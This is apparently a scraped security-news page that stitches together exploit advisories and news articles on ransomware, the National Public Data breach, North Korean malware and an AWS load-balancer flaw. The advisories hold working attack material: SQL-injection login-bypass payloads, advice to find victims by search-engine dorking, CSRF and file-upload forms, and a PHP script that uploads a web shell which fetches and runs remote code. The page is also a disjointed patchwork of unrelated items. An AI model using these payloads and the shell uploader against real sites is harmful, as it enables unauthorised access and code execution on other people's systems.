Company Visitor Management version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Company Visitor Management 1.0 Auth By Pass Vulnerability                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/wp-content/uploads/2019/04/Company-Visitor-Management-System-PHP.zip                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] http://127.0.0.1/cvms/index.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Company Visitor Management 1.0 SQL Injection

CMSsite version 1.0 suffers from a remote shell upload vulnerability.

    =============================================================================================================================================| # Title     : CMSsite 1.0 php code injection Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://github.com/VictorAlagwu/CMSsite/archive/master.zip                                                                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] Line 31    Line 40  [+] change the path of the script folder.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload : <?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(        'create_post' => '',        'post_image' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'post_title' => 'inouva',        'post_category_id' => '123',        'post_tags' => '99',        'post_content' => 'N0_name',        'post_status' => 'Hackers',        'qty' => '1'    );    echo "(+) PHP Code Injection ...\n";    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/CMSsite-master/admin/posts.php?source=add_post");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/CMSsite-master/img/$file_name\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);[+] Path : http://127.0.0.1/CMSsite-master/img/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

CMSsite 1.0 Shell Upload

CMS RIMI version 1.3 suffers from cross site request forgery and arbitrary file upload vulnerabilities.

=============================================================================================================================================  
| # Title     : CMS RIMI v1.3 CSRF Vulnerability                                                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://github.com/myroot593/RIMICMS                                                                                        |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 9.

[+] Set the target site link Save changes and apply . 

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Profile User Form</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/RIMICMS-master/admin/tambah-user.php" method="POST">  
          
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required>

          
        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required>

          
        <label for="confirm_password">Confirm Password:</label>  
        <input type="password" id="confirm_password" name="confirm_password" required>

          
        <label for="nama">Nama:</label>  
        <input type="text" id="nama" name="nama" required>

          
        <label for="email">Email:</label>  
        <input type="email" id="email" name="email" required>

          
        <input type="hidden" name="id" value="">

          
        <button type="submit">Submit</button>  
    </form>  
</body>  
</html>

------------------ [+] Part 2 arbitrary file upload file uplaod [+] -------------

[+] Go to the line 3.

[+] Set the target site link Save changes and apply .

[+] Your file : 127.0.0.1/cmsrimi/content 

[+] save code as poc.html .

<p class="sukses-form"></p>  
<p class="error-form"></p>  
<form action="http://127.0.0.1/RIMICMS-master/admin/tambah-berita.php" method="post" enctype="multipart/form-data">  
  <div class="form-group ">  
      <label>Judul :</label>  
      <input type="text" name="judul_berita" class="form-control" id="judul_berita1" placeholder="Masukan judul berita" value="">  
      <span><p class="error-form"></p></span>  
  </div>  
  <div class="form-group ">  
    <label>Isi Berita :</label>  
    <textarea class="ckeditor" name="isi_berita" id="isi_berita"></textarea>  
    <span><p class="error-form"></p></span>  
  </div>  
  <div class="form-group">  
    <label>Kategori Berita :</label>  
    <select class='form-control' name='kategori_berita' id='kategori_berita' required=''><option value=1>1</option><option value=a60CyEG6>a60CyEG6</option><option value=0+0+0+1>0+0+0+1</option><option value=basGxKs3>basGxKs3</option><option value=${9999829+9999678}>${9999829+9999678}</option><option value=1&n991278=v96422>1&n991278=v96422</option><option value=)>)</option><option value=/etc/passwd>/etc/passwd</option><option value=!(()&&!|*|*|>!(()&&!|*|*|</option><option value=^(#$!@#$)(()))******>^(#$!@#$)(()))******</option><option value=\'"()>\'"()</option><option value=testasp.vulnweb.com>testasp.vulnweb.com</option><option value=kategori-berita.php>kategori-berita.php</option><option value=file:///etc/passwd>file:///etc/passwd</option><option value=WEB-INF/web.xml?>WEB-INF/web.xml?</option><option value=WEB-INFweb.xml?>WEB-INFweb.xml?</option><option value=1\'">1\'"</option><option value=></option><option value=/WEB-INF/web.xml?>/WEB-INF/web.xml?</option><option value=/www.vulnweb.com>/www.vulnweb.com</option><option value=\'">\'"</option><option value=942313>942313</option><option value=@@5nFvp>@@5nFvp</option><option value=<!--><!--</option><option value=JyI=>JyI=</option><option value=//www.vulnweb.com>//www.vulnweb.com</option><option value=1_927257>1_927257</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1acuON4DgYSPCb>1acuON4DgYSPCb</option><option value=1_924662>1_924662</option><option value=1 src=943436>1 src=943436</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_996088>1_996088</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_984620>1_984620</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option></select>  <p class="error-form"></p>  
  </div>  
  <div class="form-group">  
    <label>Status:</label>  
    <select class="form-control" name="status_berita" id="status_berita">  
      <option value="Diterbitkan">Diterbitkan</option>  
      <option value="Draft">Draft</option>  
    </select>  
  </div>  
  <div class="form-group">  
      <label>Gambar Berita</label>  
      <input type="hidden" name="tanggal_berita" id="tanggal_berita" value="24-08-22">  
      <input type="file" class="form-control-file" id="gambar_berita" name="gambar_berita">  
  <p class="error-form"></p>  
  </div>  
  <button type="submit" class="btn btn-primary">Submit</button>  
</form>  
  <p class="error-form"></p>    
  <p class="error-form"></p>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

CMS RIMI 1.3 Cross Site Request Forgery / File Upload

Client Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Client ms Project 1.0 Auth By Pass Vulnerability                                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/client-management-system-using-php-mysql/                                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = 'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/CCMS/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Client Management System 1.0 SQL Injection

CCMS Project version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : CCMS Project 1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/                                                        |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = 'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/CCMS/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

CCMS Project 1.0 SQL Injection

Biobook Social Networking Site version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : biobook Social Networking Site 1.0 Auth By Pass Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/janobe/Social%20Networking%20Site%20in%20PHP%20with%20Full%20Source%20Code.zip                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = 'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/social/home.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Biobook Social Networking Site 1.0 SQL Injection

The threat actors behind a recently observed Qilin ransomware attack have stolen credentials stored in Google Chrome browsers on a small set of compromised endpoints.
The use of credential harvesting in connection with a ransomware infection marks an unusual twist, and one that could have cascading consequences, cybersecurity firm Sophos said in a Thursday report.
The attack, detected in July

The threat actors behind a recently observed Qilin ransomware attack have stolen credentials stored in Google Chrome browsers on a small set of compromised endpoints.

The use of credential harvesting in connection with a ransomware infection marks an unusual twist, and one that could have cascading consequences, cybersecurity firm Sophos said in a Thursday report.

The attack, detected in July 2024, involved infiltrating the target network via compromised credentials for a VPN portal that lacked multi-factor authentication (MFA), with the threat actors conducting post-exploitation actions 18 days after initial access took place.

"Once the attacker reached the domain controller in question, they edited the default domain policy to introduce a logon-based Group Policy Object (GPO) containing two items," researchers Lee Kirkpatrick, Paul Jacobs, Harshal Gosalia, and Robert Weiland said.

The first of them is a PowerShell script named "IPScanner.ps1" that's designed to harvest credential data stored within the Chrome browser. The second item is a batch script ("logon.bat") contacting commands to execute the first script.

"The attacker left this GPO active on the network for over three days," the researchers added.

"This provided ample opportunity for users to log on to their devices and, unbeknownst to them, trigger the credential-harvesting script on their systems. Again, since this was all done using a logon GPO, each user would experience this credential-scarfing each time they logged in."

The attackers then exfiltrated the stolen credentials and took steps to erase evidence of the activity before encrypting the files and dropping the ransom note in every directory on the system.

The theft of credentials stored in the Chrome browser means that affected users are now required to change their username-password combinations for every third-party site.

"Predictably, ransomware groups continue to change tactics and expand their repertoire of techniques," the researchers said.

"If they, or other attackers, have decided to also mine for endpoint-stored credentials – which could provide a foot in the door at a subsequent target, or troves of information about high-value targets to be exploited by other means – a dark new chapter may have opened in the ongoing story of cybercrime."

**Ever-evolving Trends in Ransomware**

The development comes as ransomware groups like Mad Liberator and Mimic have been observed using unsolicited AnyDesk requests for data exfiltration and leveraging internet-exposed Microsoft SQL servers for initial access, respectively.

The Mad Liberator attacks are further characterized by the threat actors abusing the access to transfer and launch a binary called "Microsoft Windows Update" that displays a bogus Windows Update splash screen to the victim to give the impression that software updates are being installed while the data is being plundered.

The abuse of legitimate remote desktop tools, as opposed to custom-made malware, offers attackers the perfect disguise to camouflage their malicious activities in plain sight, allowing them to blend in with normal network traffic and evade detection.

Ransomware continues to be a profitable venture for cybercriminals despite a series of law enforcement actions, with 2024 set to be the highest-grossing year yet. The year also saw the largest ransomware payment ever recorded at approximately $75 million to the Dark Angels ransomware group.

"The median ransom payment to the most severe ransomware strains has spiked from just under $200,000 in early 2023 to $1.5 million in mid-June 2024, suggesting that these strains are prioritizing targeting larger businesses and critical infrastructure providers that may be more likely to pay high ransoms due to their deep pockets and systemic importance," blockchain analytics firm Chainalysis said.

Ransomware victims are estimated to have paid $459.8 million to cybercriminals in the first half of the year, up from $449.1 million year-over-year. However, total ransomware payment events as measured on-chain have declined YoY by 27.29%, indicating a drop in payment rates.

What's more, Russian-speaking threat groups accounted for at least 69% of all cryptocurrency proceeds linked to ransomware throughout the previous year, exceeding $500 million.

According to data shared by NCC Group, the number of ransomware attacks observed in July 2024 jumped month-on-month from 331 to 395, but down from 502 registered last year. The most active ransomware families were RansomHub, LockBit, and Akira. The sectors that were most frequently targeted include industrials, consumer cyclicals, and hotels and entertainment.

Industrial organizations are a lucrative target for ransomware groups due to the mission-critical nature of their operations and the high impact of disruptions, thus increasing the likelihood that victims could pay the ransom amount demanded by attackers.

"Criminals focus where they can cause the most pain and disruption so the public will demand quick resolutions, and they hope, ransom payments to restore services more quickly," said Chester Wisniewski, global field chief technology officer at Sophos.

"This makes utilities prime targets for ransomware attacks. Because of the essential functions they provide, modern society demands they recover quickly and with minimal disruption."

Ransomware attacks targeting the sector have nearly doubled in Q2 2024 compared to Q1, from 169 to 312 incidents, per Dragos. A majority of the attacks singled out North America (187), followed by Europe (82), Asia (29), and South America (6).

"Ransomware actors are strategically timing their attacks to coincide with peak holiday periods in some regions to maximize disruption and pressure organizations into payment," NCC Group said.

Malwarebytes, in its own 2024 State of Ransomware report, highlighted three trends in ransomware tactics over the past year, including a spike in attacks during weekends and early morning hours between 1 a.m. and 5 a.m., and a reduction in the time from initial access to encryption.

Another noticeable shift is the increased edge service exploitation and targeting of small and medium-sized businesses, WithSecure said, adding the dismantling of LockBit and ALPHV (aka BlackCat) has led to an erosion of trust within the cybercriminal community, causing affiliates to move away from major brands.

Indeed, Coveware said over 10% of the incidents handled by the company in Q2 2024 were unaffiliated, meaning they were "attributed to attackers that were deliberately operating independently of a specific brand and what we typically term 'lone wolves.'"

"Continued takedowns of cybercriminal forums and marketplaces shortened the lifecycle of criminal sites, as the site administrators try to avoid drawing law enforcement (LE) attention," Europol said in an assessment released last month.

"This uncertainty, combined with a surge in exit scams, have contributed to the continued fragmentation of criminal marketplaces. Recent LE operations and the leak of ransomware source codes (e.g., Conti, LockBit, and HelloKitty) have led to a fragmentation of active ransomware groups and available variants."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Qilin Ransomware Attack Uses VPN Credentials, Steals Chrome Data

It’s not unusual for a threat actor to exaggerate the extent of a hack or breach to drum up interest, and hopefully, the eventual purchase or ransom price.

Thursday, August 22, 2024 14:00

My current least favorite thing about the churn of social media that I’ve seen over the past week is waves of stories, posts and videos saying that every U.S. citizen’s Social Security number has been stolen or potentially viewed by a threat actor. 

The claim comes from a class action lawsuit filed on Aug. 1 against a data broker called National Public Data, claiming they failed to keep U.S. citizens’ Social Security numbers secure. A threat actor going by USDoD claimed in April that it had accessed a database that included information on every person in the U.S., Canada and the U.K.  

The lawsuit states that a breach at National Public Data resulted in the exposure of more than 3 billion personal records (a number that obviously surpasses the current population of the U.S.), including every Social Security number. That sounds scary, and many people took the statement as fact, running to create warnings that your Social Security number had definitely been breached and you needed to “TAKE ACTION NOW!” 

Except, the claim in the lawsuit is still unsubstantiated. This is not to say there was never a breach or that \*some\* public records weren’t stolen or accessed, but almost certainly not literally every single Social Security number. 

For starters, I used a tool from security firm Pentester that allows users to search for if their Social Security number, birthday, or other sensitive information may be in the NPD Breach. I searched for everyone in my immediate family, parents, and stepparents, and nothing turned up. I suppose it’s possible that for some reason just my family was exempted from the breach, but that seems unlikely. 

Reporters at TechCrunch have also viewed the allegedly stolen data, and determined much of the information was incomplete or incorrect, though some of it was legitimate. 

It’s not unusual for a threat actor to exaggerate the extent of a hack or breach to drum up interest, and hopefully, the eventual purchase or ransom price. Which is why I’m disappointed that so many people took off and ran with the claim that every American was affected by this breach. 

There are always steps we can be taking to better protect our personal information, so I don’t want to make it seem like we’re all totally safe and to just go about your business as usual. And if you do use the linked tool above and find that your information may be affected by the NPD breach, it could be a good idea to freeze your credit or keep a close eye on your bank account(s).  

But all the LinkedIn posts and viral videos claiming that every American’s had their Social Security number stolen only leads to more FUD. And it plays right into attackers’ hands: By spreading that FUD, it makes users more likely to fall for other scams that are trying to capitalize on the breach by sending phony scams around identity protection or offering new information on the allegedly stolen data.  

**The one big thing **

Cisco Talos has uncovered a new remote access trojan (RAT) family we are calling “MoonPeak.” This a XenoRAT-based malware, which is under active development by a North Korean nexus cluster we are calling “UAT-5394.” Our analysis of infrastructure used in the campaign reveals additional links to the UAT-5394 infrastructure and new tactics, techniques and procedures (TTPs) of the threat actor. This cluster of activity has some overlaps in TTPs and infrastructure patterns with the North Korean state-sponsored group “Kimsuky,” however, we do not have substantial technical evidence to link this campaign with the APT. 

**Why do I care? **

Either UAT-5394 is actually Kimsuky (or a sub-group within Kimsuky) and they are replacing QuasarRAT with MoonPeak. (We have observed UAT-5394 actively setting up and operating QuasarRAT C2 servers before they eventually adopted the use of XenoRAT and MoonPeak.) Or UAT-5394 is another group within the North Korean APT machinery that borrows their TTPs and infrastructure patterns from Kimsuky. Any actor potentially associated with North Korea is worth watching, as these groups are constantly trying to steal money, intellectual property or data on behalf of the state. So, any new developments in how state-sponsored actors work together is relevant to defenders and users alike. 

**So now what? **

Talos released a new Snort rule set that detects the new malware disclosed this week. The timelines of the consistent adoption of new malware and its evolution such as in the case of MoonPeak highlights that UAT-5394 continues to add and enhance more tooling into their arsenal. And the rapid pace of establishing new supporting infrastructure by UAT-5394 indicates that the group is aiming to rapidly proliferate this campaign and set up more drop points and C2 servers, so this is activity we’ll be continuing to monitor and update readers on. 

**Top security headlines of the week **

**A North Korean state-sponsored actor recently exploited a zero-day vulnerability that Microsoft patched earlier this month.** Security researchers say that actors connected to the Lazarus Group, the most prolific and well-known North Korean APT, actively exploited CVE-2024-38193. This is a use-after-free issue in AFD.sys, a binary file in what's essentially the kernel entry point for the Winsock API. The actors then installed the FudModule malware, which was first discovered in 2022. FudModule is more stealthy than other malware, finding additional and new ways to hide from detection. Microsoft disclosed and patched CVE-2024-38193 earlier this month as part of its regular Patch Tuesday update cycle. At the time, it was listed as a zero-day, meaning adversaries had exploited the issue in the wild before a patch was available. This was one of the six zero-days included in Microsoft Patch Tuesday this month. An attacker who exploits the vulnerability could obtain nearly full access to Windows and usually run untrusted code. (Ars Technica, PC World) 

**The FBI and other U.S. federal agencies publicly stated that Iran is behind recent cyber attacks targeting both major U.S. presidential campaigns.** A public statement warned that state-sponsored actors from Iran were trying to “stoke discord and undermine confidence in our democratic institutions.” Threat actors successfully breached an email account belonging to a staffer on former U.S. President Donald Trump’s campaign and leaked that information, though many major news outlets declined to publish any reports on the information because of the way in which it was obtained. “The \[intelligence community\] is confident that the Iranians have through social engineering and other efforts sought access to individuals with direct access to the Presidential campaigns of both political parties,” U.S. intelligence officials said in the statement. The presidential campaigns from the Democratic and Republican parties both said they received spear-phishing emails seemingly connected to the efforts. (Associated Press, BBC) 

**Nearly all Google Pixel devices since 2017 have been vulnerable to an exploit that exists in an otherwise dormant app.** Security researchers disclosed the vulnerability last week in Showcase.apk, a software package that exists on all Pixel phones and can be used to turn the devices into store demos for Verizon. Though details on the exact type of vulnerability are still unclear, a report from iVerify stated that the way the software operates fundamentally changes the way the Android operating system works, leaving Pixel devices susceptible to man-in-the-middle attacks or the installation of spyware. Google has since removed the software package from all devices, as it is no longer in use. A Google representative told Recorded Future that it had not seen any information indicating the software had been exploited, and that the hypothetical exploit requires the attacker to have physical access to the device and knowing the user’s device passcode. The app is not present on the Pixel 9, the newest line of phones Google unveiled this week. (Wired, The Record) 

**Can’t get enough Talos? **

*   How multiple vulnerabilities in Microsoft apps for macOS pave the way to stealing permissions 
*   Talos Takes Ep. #194: A 1-on-1 with Talos VP Matt Watchinski 
*   MoonPeak malware from North Korean actors unveils new details on attacker infrastructure 
*   Bug Leaves Microsoft Apps for MacOS Open to Silent Takeovers 
*   Multiple flaws in Microsoft macOS apps unpatched despite potential risks 
*   Multiple Microsoft Apps for macOS Vulnerable to Library Injection Attacks 

**Upcoming events where you can find Talos **

**_BSides Krakow_** **_(Sept. 14)_**  

_Krakow, Poland_ 

**_LABScon_** **_(Sept. 18 - 21)_** 

_Scottsdale, Arizona_

**_VB2024_** **_(Oct. 2 - 4)_**

_Dublin, Ireland_

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 70ff63cd695033f624a456a5c8511ce8312cffd8ac40492ffe5dc7ae18548668  
**MD5:** 49d35332a1c6fefae1d31a581a66ab46  
**Typical Filename:** 49d35332a1c6fefae1d31a581a66ab46.virus  
**Claimed Product:** N/A  
**Detection Name:** W32.Auto:70ff63.in03.Talos

**SHA 256:** db697b450d015ee948bb50d895acca3e27058b6d546d93212791b9f5ff31c0a3  
**MD5:** 391b3770ab60f9e535fbf3db70c89b04  
**Typical Filename:** vt-upload-o0OJb  
**Claimed Product:** N/A  
**Detection Name:** W32.Auto.db697b.181952.in01

**SHA 256:** a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0  
**MD5:** b4440eea7367c3fb04a89225df4022a6  
**Typical Filename:** Pdfixers.exe  
**Claimed Product:** Pdfixers  
**Detection Name:** W32.Superfluss:PUPgenPUP.27gq.1201

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
**MD5:** 8c69830a50fb85d8a794fa46643493b2  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Dropper.Generic::1201

**SHA 256:** 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d  
**MD5:** fd743b55d530e0468805de0e83758fe9  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** W32.File.MalParent

No, not every Social Security number in the U.S. was stolen

As many as 15,000 applications using Amazon Web Services' (AWS) Application Load Balancer (ALB) for authentication are potentially susceptible to a configuration-based issue that could expose them to sidestep access controls and compromise applications.
That's according to findings from Israeli cybersecurity company Miggo, which dubbed the problem ALBeast.
"This vulnerability allows attackers to

Cloud Security / Application Security

As many as 15,000 applications using Amazon Web Services' (AWS) Application Load Balancer (ALB) for authentication are potentially susceptible to a configuration-based issue that could expose them to sidestep access controls and compromise applications.

That's according to findings from Israeli cybersecurity company Miggo, which dubbed the problem **ALBeast**.

"This vulnerability allows attackers to directly access affected applications, particularly if they are exposed to the internet," security researcher Liad Eliyahu said.

ALB is an Amazon service designed to route HTTP and HTTPS traffic to target applications based on the nature of the requests. It also allows users to "offload the authentication functionality" from their apps into the ALB.

"Application Load Balancer will securely authenticate users as they access cloud applications," Amazon notes on its website.

"Application Load Balancer is seamlessly integrated with Amazon Cognito, which allows end users to authenticate through social identity providers such as Google, Facebook, and Amazon, and through enterprise identity providers such as Microsoft Active Directory via SAML or any OpenID Connect-compliant identity provider (IdP)."

The attack, at its core, involves a threat actor creating their own ALB instance with authentication configured in their account.

In the next step, the ALB is used to sign a token under their control and modify the ALB configuration by forging an authentic ALB-signed token with the identity of a victim, ultimately using it to access the target application, bypassing both authentication and authorization.

In other words, the idea is to have AWS sign the token as if it had actually originated from the victim system and use it to access the application, assuming that it's either publicly accessible or the attacker already has access to it.

Following responsible disclosure in April 2024, Amazon has updated the authentication feature documentation and added a new code to validate the signer.

"To ensure security, you must verify the signature before doing any authorization based on the claims and validate that the signer field in the JWT header contains the expected Application Load Balancer ARN," Amazon now explicitly states in its documentation.

"Also, as a security best practice we recommend you restrict your targets to only receive traffic from your Application Load Balancer. You can achieve this by configuring your targets' security group to reference the load balancer's security group ID."

The disclosure comes as Acronis revealed how a Microsoft Exchange misconfiguration could open the door to email spoofing attacks, allowing threat actors to bypass DKIM, DMARC, and SPF protections and send malicious emails masquerading as trusted entities.

"If you didn't lock down your Exchange Online organization to accept mail only from your third-party service, or if you didn't enable enhanced filtering for connectors, anyone could send an email to you through ourcompany.protection.outlook.com or ourcompany.mail.protection.outlook.com, and DMARC (SPF and DKIM) verification will be skipped," the company said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New 'ALBeast' Vulnerability Exposes Weakness in AWS Application Load Balancer

AVMS Project version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : AVMS Project 1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/wp-content/uploads/2019/07/Apartment-Visitors-Management-System-Project.zip                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = 'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/AVMS/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#google